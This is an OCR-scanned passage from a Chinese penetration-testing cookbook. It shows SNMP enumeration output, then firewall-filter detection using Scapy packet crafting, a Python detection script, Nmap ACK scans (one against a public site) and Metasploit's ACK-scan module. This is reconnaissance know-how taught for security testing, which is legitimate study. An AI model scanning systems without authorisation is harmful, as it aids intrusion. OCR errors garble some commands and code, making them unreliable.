在 输出 的 一 部 分 中 ， 可 以 看 到 十 六 
网 络 接口 ， 我 们 就 可 以 知道 ， 这 些 
IP 和 MAC 地 址 的 关联 。 


进 制 值 和 IP 地 址 的 列表 。 通 过 参考 已 知 系统 的 
x ARP 缓存 的 内 容 。 它 表明 了 储存 在 设备 中 的 


STRING: "FreeSSHDService.exe" 
STRING: "vmtoolsd.exe" 
STRING: "java.exe" 

STRING: "postgres.exe" 
STRING: "java.exe" 

STRING: "java.exe" 

STRING: "TPAutoConnSvc.exe" 
STRING: "snmp.exe" 

STRING: "snmptrap.exe" 
STRING: "TPAutoConnect.exe" 
STRING: "alg.exe" 

STRING: "cmd.exe" 

STRING: "postgres.exe" 
STRING: "freeSSHd 1.2.0" 
STRING: "CesarFTP 0.99g" 
STRING: "VMware Tools" 
STRING: "Python 2.7.1" 
STRING: "WebFldrs XP" 
STRING: "VMware Tools" 


此 外 ， 运 行进 程 和 安装 的 应 用 的 列表 可 以 在 输出 中 找到 。 这 个 信息 在 枚 举 运行 在 目 
标 系统 的 服务 ， 以 及 识别 潜在 的 可 利用 漏洞 时 十 分 有 用 。 


工作 原理 


不 像 Onesixtyone，SNMPwalk 不 仅仅 能 够 识别 默认 SNMP. 团体 字符 串 的 使 用 ， 
也 可 以 利用 这 个 配置 来 收集 大 量 来 自 目标 系统 的 信息 。 这 可 以 通过 使 用 一 序列 
SNMP GETNEXT 请 求 ， 并 使 用 请 求 来 爆破 系统 的 所 有 可 用 信息 来 完成 。 


4.14 Scapy 防火 墙 识别 


通过 评估 从 封包 注入 返回 响应 ， 我 们 就 可 以 判断 远程 端口 是 否 被 防火 墙 设备 过 滤 。 
为 了 对 这 个 过 程 如 何 工作 有 个 彻底 的 认识 ， 我 们 可 以 使 用 Scapy 在 封包 级 别 执行 这 
个 任务 。 


准备 


为 了 使 用 Scapy 来 执行 防火 墙 识别 ， 你 需要 运行 网 络 服务 的 远程 系统 。 此 外 ， 你 需 
要 实现 一 些 过 滤 机 制 。 这 可 以 使 用 独立 防火 墙 设备 ， 或 者 基于 主机 的 过 滤 ， 例 如 
Windows 防火 墙 来 完成 。 通 过 操作 防火 墙 设备 的 过 滤 设 置 ， 你 应 该 能 够 修改 被 注入 
封包 的 响应 。 


操作 步骤 
为 了 高 效 判 断 是 否 TCP 端口 被 过 滤 ， 需 要 向 目标 端口 发 送 TCP SYN 和 ACK 封 
包 。 基 于 用 于 响应 这 些 注入 的 封包 ， 我 们 可 以 判断 端口 是 否 多 虑 。 这 两 个 封包 的 注 
入 可 能 会 产生 四 种 不 同 的 响应 组 合 。 我 们 会 讨论 每 一 种 场景 ， 它 们 对 于 目标 端口 的 
过 滤 来 说 表示 什么 ， 以 及 如 何 测试 它们 。 这 四 个 可 能 的 响应 组 合 如 下 : 

e SYN 请 求 没有 响应 ，ACK 请 求 收 到 RST 响应 。 

e SYN 请 求 收 到 SYN+ACK 或 者 SYN+RST 响应 ，ACK 请 求 没有 响应 。 

e SYN 请 求 收 到 SYN+ACK 或 者 SYN+RST 响应 ，ACK 请 求 收 到 RST 响应 。 

e. SYN 和 ACK 请 求 都 没有 响应 。 


SYN ACK 
1 XE RST 状态 过 滤 ， 禁 止 连 入 
2 SYN+ACK/RST 无 响应 状态 过 滤 ， 禁 止 连 出 
3 SYN+ACK/RST RST 无 过 滤 ，SYN 收 到 ACK 则 开放 ， 反 之 关闭 
4 | 无 响应 无 响应 ”无 状态 过 滤 
在 第 一 种 场景 中 ， 我 们 应 该 考虑 SYN 请 求 没有 响应 ，ACK 请 求 收 到 RST 响应 的 
配置 。 为 了 测试 它 ， 我 们 首先 应 该 发 送 TCP ACK 封包 给 目标 端口 。 为 了 发 送 TCP 


ACK 封包 给 任何 给 定 的 端口 ， 我 们 首先 必须 构建 请 求 的 层级 ， 我 们 首先 需要 构建 
IP E: 


root@KaliLinux:~# scapy Welcome to Scapy (2.2.0) 
>>> i = IP() 
>>> i.display() 
HHH IP ]### 
version= 4 


ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag- 0 
ttl= 64 
proto= ip 


chksum= None 
src= 127.0.0.1 
dst= 127.0.0.1 
\options\ 
>>> i.dst = "172.16.36.135" 
>>> i.display() 
###[ IP ]### 
version= 4 


ihl= None 
tos- 0x0 
len- None 
id- 1 
flags- 
frag- 0 
ttl- 64 
proto- ip 


chksum- None 

src= 172.16.36.180 
dst- 172.16.36.135 
\options\ 


为 了 构建 请 求 的 IP 层 ， 我 们 需要 将 IP FARATE i 。 通 过 调用 display à 
数 ， 我 们 可 以 确定 对 象 的 属性 配置 。 通 常 ， 发 送 和 接受 地 址 都 设 为 回 送 地 

a> 127.0.0.1 。 这 些 值 可 以 通过 修改 目标 地 址 来 修改 ， 也 就 是 设置 i.dst 为 
想 要 扫描 的 地 址 的 字符 串 值 。 通 过 再 次 调用 dislay 函数， 我 们 看 到 不 仅仅 更 新 的 
目标 地 址 ， 也 自动 更 新 了 和 默认 接口 相关 的 源 IP 地 址 。 现 在 我 们 构建 了 请 求 的 IP 
层 ， 我 们 可 以 构建 TCP ET» 


>>> t = TCP() 
>>> t.display() 
###[ TCP ]### 
sport= ftp_data 
dport= http 
seq= 0 
ack= 0 
dataofs= None 
reserved= 0 
flags= S 
window= 8192 
chksum= None 
urgptr= 0 
options= {} 
>>> t.dport = 22 
>>> t.flags = 'A' 
>>> t.display() 
###[ TCP ]### 
sport= ftp_data 
dport= ssh 
seq= 0 
ack= 0 
dataofs= None 
reserved= 0 
flags= A 
window= 8192 
chksum= None 
urgptr= 0 
options= {} 


为 了 构建 请 求 的 TCP 层 ， 我 们 使 用 和 IP 层 相 同 的 技巧 。 在 这 个 立即 中 ， TCP 对 
ZERAT t 变量 。 像 之 前 提 到 的 那样 ， 默 认 的 配置 可 以 通过 调用 display HH 
来 确定 。 这 里 我 们 可 以 看 到 目标 端口 的 默认 值 为 HTTP 端口 80。 对 于 我 们 的 首次 
扫描 ， 我 们 将 TCP 设置 保留 默认 。 现 在 我 们 创建 了 TCP fe IP 层 ， 我 们 需要 将 它 
们 县 放 来 构造 请 求 。 


>>> request = (i/t) 
>>> request.display() 
###[ IP ]### 
version= 4 
ihl= None 
tos= 0x0 
len= None 
id- 1 
flags- 
frag- 0 
ttl- 64 
proto- tcp 
chksum- None 
src- 172.16.36.180 
dst= 172.16.36.135 
\options\ 
##H#[ TCP ]### 
sport= ftp_data 
dport= ssh 
seq= 0 
ack= 0 
dataofs= None 
reserved= 0 
flags= A 
window= 8192 
chksum= None 
urgptr= 0 
options= {} 


RIT Via AHLT ETRE MIP Fe TOP 层 。 这 些 层 面 之 后 赋 给 了 新 的 变 
量 ， 它 代表 整个 请 求 。 我 们 之 后 可 以 调用 dispaly 函数 来 查看 请 求 的 配置 。 一 旦 
构建 了 请 求 ， 可 以 将 其 传递 给 sri 函数 来 分 析 响应 : 


>>> response = sri(request, timeout=1) 
..Begin emission: 
nu qu E Finished to send 1 packets. 


Received 16 packets, got 1 answers, remaining O packets 
>>> response.display() 
HHH [ IP ]### 

version= 4L 


ihl- 5L 
tos- 0x0 
len- 40 
id- 0 
flags- DF 
frag- OL 
ttl- 63 
proto- tcp 


chksum- 0x9974 
src- 172.16.36.135 
dst- 172.16.36.180 
\options\ 

###[ TCP ]### 
sport= ssh 
dport= ftp_data 
seq= 0 
ack= 0 
dataofs= 5L 
reserved= OL 
flags= R 
window= 0 
chksum= @xe5b 
urgptr= 0 
options= {} 

###[ Padding ]### 
load= '\x00\x00\x00\x00\x00\x00' 


da A 65 38 RT VA Aid ie HE FIRE E RR © RZ > PUTRI BRAY Ro 
令 ， 通 过 直接 调用 函数 并 传递 合适 的 参数 : 


>>> response = sri(IP(dst="172.16.36.135")/TCP(dport=22, flags=' 
A'),timeout-1) 

..Begin emission: 

mecs Finished to send 1 packets. 


Received 15 packets, got 1 answers, remaining O packets 

>>> response 

«IP version=4L ihl-5L tos=0x0 len=40 id=0 flags-DF frag-OL ttl- 

63 proto=tcp chksum=0x9974 src-172.16.36.135 dst-172.16.36.180 

options=[] |<TCP sport=ssh dport-ftp data seq=0 ack=0 dataofs- 

5L reserved=0L flags=R window=0 chksum=0xe5b urgptr=0 |<Padding 
load='\x00\x00\x00\xO00\xOO0\x00' |>>> 


要 注意 在 这 个 特定 场景 中 ， 注 入 的 ACK 封包 的 响应 是 RST 封包 。 测 试 的 下 一 步 就 
是 以 相同 方式 注入 SYN 封包 。 


>>> response = sri(IP(dst="172.16.36.135")/TCP(dport=22, flags=' 
S'),timeout-1,verbose =1) 

Begin emission: 

Finished to send 1 packets. 


Received 9 packets, got 0 answers, remaining 1 packets 


以 相同 方式 发 送 SYN 请 求 之 后 ， 没 有 收 到 任何 响应 ， 并 且 元 数 在 超时 时 间 达 到 只 
有 断 开 了 连接 。 这 个 响应 组 合 表明 发 生 了 状态 包 过 滤 。 和 套 接 字 通 过 丢掉 SYN 请 求 
拒绝 了 所 有 入 境 的 连接 ， 但 是 没有 过 滤 ACK 封包 来 确保 仍旧 存在 出 境 连 接 和 持续 
中 的 通信 。 这 个 响应 组 合 可 以 在 Python 中 测试 来 确认 状态 过 滤 的 端口 : 


root@KaliLinux:~# python 
Python 2.7.3 (default, Jan 2 2013, 16:53:07) 
[GCC 4.7.2] on linux2 
Type "help", "copyright", "credits" or "license" for more infor 
mation. 
>>> from scapy.all import * 
>>> ACK response = sri(IP(dst="172.16.36.135")/TCP(dport=22, fla 
gs='A'), timeout=1, verbose =0) 
>>> SYN response = sri(IP(dst="172.16.36.135")/TCP(dport=22, fla 
gs='S'), timeout=1, verbose =0) 
>>> if ((ACK_response == None) or (SYN_response == None)) and no 
t ((ACK response ==None) and (SYN response == None)): 

SE print "Stateful filtering in place" 

. Stateful filtering in place 
>>> exit() 


在 使 用 Scapy 生成 每 个 请 求 之 后 ， 测 试 可 以 用 于 评估 这 些 响 应 ， 来 判断 是 否 ACK 
或 者 SYN (但 不 是 全 部 ) 请 求 接受 到 了 响应 。 这 个 测试 对 于 识别 该 场景 以 及 下 一 个 
场景 十 分 高 效 ， 其 中 SYN 注入 而 不 是 ACK 注入 接受 到 了 响应 。 


SYN 注入 收 到 了 SYN+ACK 或 者 RST+ACK 响应 ， 但 是 ACK 注入 没有 收 到 响应 的 
场景 ， 也 表明 存在 状态 过 滤 。 剩 余 的 测试 也 一 样 。 首 先 ， 向 目标 端口 发 送 ACK H 
&, o 


>>> response = sri(IP(dst-z"172.16.36.135")/TCP(dport-22,flags-' 
A'),timeout=1, verbose =1) 

Begin emission: 

Finished to send 1 packets. 


Received 16 packets, got 0 answers, remaining 1 packets 


在 这 个 场景 中 可 以 执行 完全 相 同 的 测试 , 如 果 两 哥 注入 请 求 之 一 收 到 响应 ,测试 就 
表明 存在 状态 过 滤 。 


root@KaliLinux:~# python 
Python 2.7.3 (default, Jan 2 2013, 16:53:07) 
[GCC 4.7.2] on linux2 
Type "help", "copyright", "credits" or "license" for more infor 
mation. 
>>> from scapy.all import * 
>>> ACK response = sri(IP(dst="172.16.36.135")/TCP(dport=22, fla 
gs='A'), timeout=1, verbose =0) 
>>> SYN response = sri(IP(dst="172.16.36.135")/TCP(dport=22, fla 
gs='S'), timeout=1, verbose =0) 
>>> if ((ACK_response == None) or (SYN_response == None)) and no 
t ((ACK response ==None) and (SYN response == None)): 

E print "Stateful filtering in place" 

. Stateful filtering in place 
>>> exit() 


响应 的 组 合 表明 ， 状 态 过 滤 执 行 在 ACK 封包 上 ， 任 何 来 自 外 部 的 符合 上 下 文 的 
ACK 封包 都 会 被 丢弃 。 但 是 ， 入 境 连 接 尝 试 的 响应 表明 ， 端 口 没 有 完全 过 滤 。 

另 一 个 可 能 的 场景 就 是 SYN 和 ACK 注入 都 收 到 了 预期 响应 。 这 种 情况 下 ， 没 有 任 
何 形式 的 过 滤 。 为 了 对 这 种 情况 执行 测试 ， 我 们 首先 执行 ACK 注入 ， 之 后 分 析 响 
应 : 


>>> response = 
sri(IP(dst="172.16.36.135")/TCP(dport=22, flags='A'),timeout=1, ve 
rbose=1) 
Begin emission: 
Finished to send 1 packets. 
Received 5 packets, got 1 answers, remaining 0 packets 
>>> response.display() 
HHH [ IP ]### 
version= 4L 


ihl- 5L 
tos- 0x0 
len- 40 
id= 0 
flags= DF 
frag- OL 
ttl- 64 
proto- tcp 


chksum- 0x9974 
src- 172.16.36.135 
dst- 172.16.36.180 
\options\ 

###[ TCP ]### 
sport= ssh 
dport= ftp_data 
seq= 0 
ack= 0 
dataofs= 5L 
reserved= OL 
flags= R 
window= 0 
chksum= @xe5b 
urgptr= 0 
options= {} 

###[ Padding ]### 
load= '\x00\x00\x00\x00\x00\x00' 


在 封包 未 被 过 滤 的 情况 下 ， 来 路 不 明 的 ACK 封包 发 送 给 了 目标 端口 ， 并 应 该 产生 
返回 的 RST 封 包 。 这 个 RST 封 包 表 明 ，ACK 封包 不 符合 上 下 文 ， 并 且 打 算 断 开 
连接 。 发 送 了 ACK 注入 之 后 ， 我 们 可 以 向 相同 端口 发 送 SYN 注入 。 


>>> response = 
sri(IP(dst="172.16.36.135")/TCP(dport=22, flags='S'),timeout=1, ve 
rbose =1) 
Begin emission: 
Finished to send 1 packets. 
Received 4 packets, got 1 answers, remaining 0 packets 
>>> response.display() 
###[ IP ]### 
version= 4L 


ihl- 5L 
tos- 0x0 
len- 44 
id= 0 
flags= DF 
frag- OL 
ttl= 64 
proto= tcp 


chksum= 0x9970 
src- 172.16.36.135 
dst- 172.16.36.180 
NoptionsN 

###[ TCP ]### 
sport= ssh 
dport= ftp_data 
seq= 1147718450 


ack= 1 
dataofs= 6L 
reserved= OL 
flags= SA 


window= 5840 

chksum= 0xd024 

urgptr= 0 

options- [('MSS', 1460) ] 
###[ Padding ]### 

load= '\x00\x00' 
>>> response[TCP].flags 
18L 
>>> int(response[TCP].flags) 
18 


在 端口 未 过 滤 并 打开 的 情况 中 ， 会 返回 SYN+ACK 响应 。 要 注意 TCP flags 属性 
的 实际 值 是 个 long 变量 ， 值 为 18。 这 个 值 可 以 轻易 使 用 int 函数 来 转换 

成 int 变量 。 这 个 18 的 值 是 TCP 标识 位 序列 的 十 进 制 值 。SYN 标志 的 十 进 制 值 
为 2， 而 ACK 标识 的 十 进 制 值 为 16。 假 设 这 里 没有 状态 过 滤 ， 我 们 可 以 通过 评估 
TCP flags 值 的 整数 转换 ， 在 Python 中 测试 端口 是 否 未 过 滤 并 打开 。 


root@KaliLinux:~# python Python 2.7.3 (default, Jan 2 2013, 16: 
53:07) 
[GCC 4.7.2] on linux2 
Type "help", "copyright", "credits" or "license" for more infor 
mation. 
>>> from scapy.all import * 
>>> ACK response = sri(IP(dst="172.16.36.135")/TCP(dport=22, fla 
gs='A'), timeout=1, verbose =0) 
>>> SYN response = sri(IP(dst="172.16.36.135")/TCP(dport=22, fla 
gs='S'), timeout=1, verbose =0) 
>>> if ((ACK_response == None) or (SYN_response == None)) and no 
t ((ACK response ==None) and (SYN response == None)): 
print "Stateful filtering in place" 
. elif int(SYN response[TCP].flags) -- 18: 
25 print "Port is unfiltered and open" 
. elif int(SYN response[TCP].flags) == 20: 
print "Port is unfiltered and closed" 
... Port is unfiltered and open 
>>> exit() 


我 们 可 以 执行 相似 的 测试 来 判断 是 否 端口 未 过 滤 并 关闭 。 未 过 滤 的 关闭 端口 会 激活 
RST 和 ACK 标识 。 像 之 前 那样 ，ACK 标识 为 整数 16，RST 标识 为 整数 4。 所 
以 ， 未 过 滤 的 关闭 端口 的 TCP flags 值 的 整数 转换 应 该 是 20 : 


root@KaliLinux:~# python Python 2.7.3 (default, Jan 2 2013, 16: 
53:07) 
[GCC 4.7.2] on linux2 
Type "help", "copyright", "credits" or "license" for more infor 
mation. 
>>> from scapy.all import * 
>>> ACK response = sri(IP(dst="172.16.36.135")/TCP(dport=4444, f 
lags='A'),timeout=1, verbo se=0) 
>>> SYN response = sri(IP(dst="172.16.36.135")/TCP(dport=4444, f 
lags='S'),timeout=1, verbo se=0) 
>>> if ((ACK_response == None) or (SYN_response == None)) and no 
t ((ACK response ==None) and (SYN response == None)): 
print "Stateful filtering in place" 
. elif int(SYN response[TCP].flags) -- 18: 
A print "Port is unfiltered and open" 
. elif int(SYN response[TCP].flags) == 20: 
print "Port is unfiltered and closed" 
... Port is unfiltered and closed 
>>> exit() 


最 后 ， 我 们 应 该 考虑 最 后 一 种 场景 ， 其 中 SYN 或 者 ACK 注入 都 没有 收 到 响应 。 这 
种 场景 中 ， 每 个 sr1 的 实例 都 会 在 超时 的 时 候 断 开 。 


>>> response = sri(IP(dst="172.16.36.135")/TCP(dport=22, flags=' 
A'),timeout=1, verbose =1) 

Begin emission: 

Finished to send 1 packets. 

Received 36 packets, got 0 answers, remaining 1 packets 

>>> response = sri(IP(dst="172.16.36.135")/TCP(dport=22, flags=' 
S'), timeout=1,verbose =1) 

Begin emission: 

Finished to send 1 packets. 

Received 18 packets, got 0 answers, remaining 1 packets 


每 个 注入 封包 都 缺少 响应 ， 表 明 端 口 存在 无 状态 过 滤 ， 仅 仅 是 丢弃 所 有 入 境 的 流 
量 ， 无 论 状 态 是 什么 。 或 者 这 表明 远程 系统 崩溃 了 。 我 们 的 第 一 想法 可 能 是 ， 可 以 
通过 在 之 前 的 测试 序列 的 末尾 向 else 添加 执行 流 ， 在 Python 中 测试 它 。 理 论 
上 ， 如 果 任 何 注入 都 没有 接受 到 响应 ， else 中 的 操作 会 执行 。 简 单 来 

说 ， else 中 的 操作 会 在 没有 接收 到 响应 的 时 候 执行 。 


root@KaliLinux:~# python Python 2.7.3 (default, Jan 2 2013, 16: 
53:07) 
[GCC 4.7.2] on linux2 
Type "help", "copyright", "credits" or "license" for more infor 
mation. 
>>> from scapy.all import * 
>>> ACK response = sri(IP(dst="172.16.36.135")/TCP(dport=4444, f 
lags='A'),timeout=1, verbo se-0) 
>>> SYN_response sri(IP(dst="172.16.36.135")/TCP(dport=4444, f 
lags='S'),timeout=1, verbo se=0) 
>>> if ((ACK_response == None) or (SYN_response == None)) and no 
t ((ACK response ==None) and (SYN response == None)): 

Sr print "Stateful filtering in place" 

. elif int(SYN response[TCP].flags) -- 18: 

x print "Port is unfiltered and open" 

. elif int(SYN response[TCP].flags) -- 20: 
: print "Port is unfiltered and closed" 

. else: 
print "Port is either unstatefully filtered or host is d 


own" 
Traceback (most recent call last): 


File "<stdin>", line 3, in «module» 
TypeError: 'NoneType' object has no attribute ' getitem ' 


这 意味 着 理论 上 可 以 生效 ， 但 是 实际 上 并 不 工作 。 操 作 值 为 空 的 变量 的 时 候 ， 


Python 实际 上 会 产生 错误 。 为 了 避免 这 种 问题 ， 首 先 就 需要 检测 没有 收 到 任何 回复 


的 情况 。 


这 个 


>>> if (ACK response == None) and (SYN response -- None): 

e print "Port is either unstatefully filtered or host is d 

own" 
Port is either unstatefully filtered or host is down 


完成 的 测试 序列 之 后 可 以 集成 到 单个 功能 性 脚本 中 。 这 个 脚本 接受 两 个 参数 ， 


包括 目标 IP 地 址 和 被 测试 的 端口 。 之 后 注入 ACK 和 SYN 封包 ， 如 果 存 在 响应 ， 
响应 会 储存 用 于 评估 。 之 后 执行 四 个 测试 来 判断 是 否 端 口上 存在 过 滤 。 一 开始 ， 会 
执行 测试 来 判断 是 否 没 有 受到 任何 响应 。 如 果 是 这 样 ， 输 出 会 表示 远程 主机 前 溃 


了 


测 


， 或 者 端口 存在 无 状态 过 滤 ， 并 丢弃 所 有 流量 。 如 果 接 收 到 了 任何 请 求 ， 会 执行 
试 来 判断 是 否 接受 到 了 某 个 注入 的 响应 ， 而 不 是 全 部 。 如 果 是 这 样 ， 输 出 会 表明 


端口 存在 状态 过 滤 。 最 后 如 果 两 个 注入 都 接受 到 了 响应 ， 端 口 会 被 识别 为 物 过 滤 ， 
并 且 会 评估 TCP 标志 位 来 判断 端口 开放 还 是 关闭 。 


#!/usr/bin/python 


import sys import logging 
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 


from scapy.all import * 


if len(sys.argv) != 3: 
print "Usage - ./ACK FW detect.py [Target-IP] [Target Port]" 


print "Example - ./ACK FW detect.py 10.0.0.5 443" 

print "Example will determine if filtering exists on port 44 
SQ host T0 040-5" 

sys.exit() 


ip = sys.argv[i] 
port = int(sys.argv[2]) 


ACK response = sri(IP(dst=ip)/TCP(dport=port, flags='A'), timeout= 
1, verbose=0) 
SYN response - sri(IP(dst=ip)/TCP(dport=port, flags='S'), timeout= 
1, verbose=0) 
if (ACK_response == None) and (SYN_response == None): 

print "Port is either unstatefully filtered or host is down" 


elif ((ACK_response == None) or (SYN_response == None)) and not 
((ACK_response ==None) and (SYN_response == None)): 
print "Stateful filtering in place" 
elif int(SYN_response[TCP].flags) == 18: 
print "Port is unfiltered and open" 
elif int(SYN_response[TCP].flags) == 20: 
print "Port is unfiltered and closed" 
else: 
print "Unable to determine if the port is filtered” 


mg: 





在 本 地 文件 系统 创建 脚本 之 后 ， 需 要 更 新 文件 许可 来 允许 脚本 执行 。 chmod 可 以 
用 于 更 新 这 些许 可 ， 脚 本 之 后 可 以 通过 直接 调用 并 传 入 预期 参数 来 执行 : 


root@KaliLinux:~# chmod 777 ACK FW detect.py 

root@KaliLinux:~# ./ACK FW detect.py 

Usage - ./ACK FW detect.py [Target-IP] [Target Port] 

Example - ./ACK FW detect.py 10.0.0.5 443 

Example will determine if filtering exists on port 443 of host 
10.0.0.5 

root@KaliLinux:~# ./ACK FW detect.py 172.16.36.135 80 Port is un 
filtered and open 

root@KaliLinux:~# ./ACK FW detect.py 172.16.36.134 22 Host is ei 
ther unstatefully filtered or is down 


工作 原理 


SYN 和 ACK TCP 标志 在 有 状态 的 网 络 通信 中 起 到 关键 作用 。SYN 请 求 允 许 建立 
新 的 TCP 会 话 ， 而 ACK 响应 用 于 在 关闭 之 前 维持 会 话 。 端 口 响 应 这 些 类 型 的 封包 
之 一 ， 但 是 不 响应 另 一 种 ， 就 可 能 存在 过 滤 ， 它 基于 会 话 状态 来 限制 流量 。 通 过 识 
别 这 种 情况 ， 我 们 就 能 够 推断 出 端口 上 存在 状态 过 滤 。 


4.15 Nmap 防火 墙 识别 


Nmap 拥有 简化 的 防火 墙 过 滤 识 别 功能 ， 基 于 ACK 探测 响应 来 识别 端口 上 的 过 
滤 。 这 个 功能 可 以 用 于 测试 单一 端口 或 者 多 个 端口 序列 来 判断 过 滤 状 态 。 


准备 
为 了 使 用 Nmap 来 执行 防火 墙 识别 ， 你 需要 运行 网 络 服务 的 远程 系统 。 此 外 ， 你 需 
要 实现 一 些 过 滤 机 制 。 这 可 以 使 用 独立 防火 墙 设 备 ， 或 者 基于 主机 的 过 滤 ， 例 如 


Windows 防火 墙 来 完成 。 通 过 操作 防火 墙 设备 的 过 渡 设 置 ， 你 应 该 能 够 修改 被 注入 
封包 的 响应 。 


操作 步骤 


为 了 使 用 Nmap 执行 防火 墙 ACK 扫描 ，Nmap 应 该 以 指定 的 IP 地 址 ， 目 标 端口 
和 -SA 选项 调用 。 


root@KaliLinux:~# nmap -sA 172.16.36.135 -p 22 


Starting Nmap 6.25 ( http://nmap.org ) at 2014-01-24 11:21 EST 
Nmap scan report for 172.16.36.135 

Host is up (0.00032s latency). 

PORT STATE SERVICE 

22/tcp unfiltered ssh 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds 
root@KaliLinux:~# nmap -sA 83.166.169.228 -p 22 


Starting Nmap 6.25 ( http://nmap.org ) at 2014-01-24 11:25 EST 
Nmap scan report for packtpub.com (83.166.169.228) 

Host is up (0.14s latency). 

PORT STATE SERVICE 

22/tcp filtered ssh 


Nmap done: 1 IP address (1 host up) scanned in 2.23 seconds 


通过 在 本 地 网 络 中 的 Metasploitable2 系统 上 执行 扫描 ， 流 量 并 不 经 过 防火 墙 ， 响 
应 表明 TCP 22 端口 是 未 过 滤 的 。 但 是 ， 如 果 我 对 packtpub. com 的 远程 |IP 地 
址 执行 相同 扫描 ， 端 口 22 是 过 滤器 的 。 通 过 执行 相同 扫描 ， 而 不 指定 端口 ， 端 口 
过 滤 评估 可 以 在 Nmap 的 1000 个 常用 端口 上 完成 。 


root@KaliLinux:~# nmap -SA 172.16.36.135 


Starting Nmap 6.25 ( http://nmap.org ) at 2014-01-24 11:21 EST 
Nmap scan report for 172.16.36.135 

Host is up (0.00041s latency). All 1000 scanned ports on 172.16. 
36.135 are unfiltered 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 0.10 seconds 


对 本 地 网 络 上 的 Metasploit2 系统 执行 扫描 时 ， 由 于 它 没有 被 任何 防火 墙 保护 ， 结 
果 表 明 所 有 端口 都 是 未 过 滤 的 。 如 果 我 们 在 packtpub.com 域内 执行 相同 扫描 ， 
所 有 端口 都 识别 为 存在 过 滤 ， 除 了 TCP 端口 80， 这 是 Web 应 用 部 署 的 地 方 。 要 
注意 在 扫描 端口 范围 的 时 候 ， 输 出 只 包含 未 过 滤 的 端口 。 


root@KaliLinux:~# nmap -sA 83.166.169.228 


Starting Nmap 6.25 ( http://nmap.org ) at 2014-01-24 11:25 EST 
Nmap scan report for packtpub.com (83.166.169.228) 

Host is up (0.15s latency). 

Not shown: 999 filtered ports 

PORT STATE SERVICE 

80/tcp unfiltered http 


Nmap done: 1 IP address (1 host up) scanned in 13.02 seconds 


为 了 在 所 有 可 能 的 TCP 端口 上 执行 扫描 ， 需 要 奥妙 所 有 可 能 的 端口 地 址 。 定 义 了 
MdL NR TOP EM Lar ， 每 一 位 可 以 为 值 1 或 者 0。 所 以 

共有 2 **16 d n TUA INEO 为 了 扫描 所 有 可 能 的 地 址 空间 ， 必 须 
提供 1 到 65535 的 范 


root@KaliLinux:~# nmap -SA 172.16.36.135 -p 1-65535 


Starting Nmap 6.25 ( http://nmap.org ) at 2014-01-24 11:21 EST 
Nmap scan report for 172.16.36.135 

Host is up (0.00041s latency). 

All 65535 scanned ports on 172.16.36.135 are unfiltered 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 1.77 seconds 


工作 原理 

余 了 Nmap 提供 的 许多 功能 ， 它 也 可 以 用 于 识别 防火 墙 过 滤 。 这 意味 着 Nmap 通 
ERE A Scapy 秘籍 o 同 技巧 ， 来 执行 这 种 防火 墙 识别 。SYN 和 来 
路 不 明 的 ACK 的 组 合 会 发 送 示 端口 ， 响 应 用 于 分 析 来 判断 过 滤 状 态 。 
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Metasploit 拥有 一 个 扫描 辅助 模块 ， 可 以 用 于 指定 多 线程 网 络 端口 分 析 ， 基 于 
SYN/ACK 探测 响应 分 析 ， 来 判断 端口 是 否 被 过 滤 。 


准备 

为 了 使 用 Metasploit RATE KA 当 识 别 ， 你 需要 运行 网 络 服务 的 远程 系统 。 此 外 ， 
你 需要 实现 一 些 过 滤 机 制 。 (UV dot uh eee ans 
4e Windows 防火 墙 来 完成 。 通 过 操作 防火 墙 设备 的 过 滤 设 置 ， 你 应 该 能 够 修改 被 


注入 封包 的 响应 。 


操作 步骤 


为 了 使 用 Metasploit ACK 扫描 模块 来 执行 防火 墙 和 过 滤 识 别 ， 你 首先 必须 从 Kali 
的 终端 中 启动 MSF 控制 台 ， 之 后 使 用 use 命令 选项 所 需 的 辅助 模块 。 


root@KaliLinux:~# msfconsole 
# cowsay++ 





< metasploit > 


\ sh 
\ (00) 
(—) )\ 


Using notepad to track pentests? Have Metasploit Pro report on h 
osts, services, sessions and evidence -- type 'go_pro' to launch 
it now. 


=[ metasploit v4.6.0-dev [core:4.6 api:1.0] 
--=[ 1053 exploits - 590 auxiliary - 174 post 
--=[ 275 payloads - 28 encoders - 8 nops 
msf > use auxiliary/scanner/portscan/ack 
msf auxiliary(ack) > show options 


Module options (auxiliary/scanner/portscan/ack): 


Name Current Setting Required Description 

BATCHSIZE 256 yes The number of hosts to 
scan per set 

INTERFACE no The name of the interfa 
ce 

PORTS 1-10000 yes Ports to scan (e.g. 22- 
25,80,110-900) 

RHOSTS yes The target address rang 
e or CIDR identifier 

SNAPLEN 65535 yes The number of bytes to 
capture 

THREADS 1 yes The number of concurren 
t threads 

TIMEOUT 500 yes The reply read timeout 


in milliseconds 


一 旦 选择 了 模块 ， 可 以 使 用 show options 命令 来 确认 或 更 改 扫 描 配 置 。 这 个 命 

令 会 展示 四 个 列 的 表格 ， 包 

括 name ^ current settings ^ required 和 description ° name 列 标 出 
了 每 个 可 配置 变量 的 名 称 。 current settings 列 列 出 了 任何 给 定 变 量 的 现 有 配 


置 。 required 列 标 出 对 于 任何 给 定 变 量 ， 值 是 否 是 必须 的 。 description 列 描 
述 了 每 个 变量 的 功能 。 任 何 给 定 变量 的 值 可 以 使 用 set 命令 ， 并 且 将 新 的 值 作为 
参数 来 修改 。 


msf  auxiliary(ack) > set PORTS 1-100 

PORTS -» 1-100 

msf auxiliary(ack) > set RHOSTS 172.16.36.135 
RHOSTS => 172.16.36.135 

msf auxiliary(ack) > set THREADS 25 

THREADS -» 25 

msf auxiliary(ack) > show options 


Module options (auxiliary/scanner/portscan/ack): 


Name Current Setting Required Description 

BATCHSIZE 256 yes The number of hosts to 
scan per set 

INTERFACE no The name of the interfa 
ce 

PORTS 1-100 yes Ports to scan (e.g. 22- 
25,80,110-900) 

RHOSTS 172.16.36.135 yes The target address rang 
e or CIDR identifier 

SNAPLEN 65535 yes The number of bytes to 
capture 

THREADS 25 yes The number of concurren 
t threads 

TIMEOUT 500 yes The reply read timeout 


in milliseconds 


在 上 面 的 例子 中 ， RHOSTS 值 修改 为 我 们 打算 扫描 的 远程 系统 的 IP 地 址 。 此 外 ， 
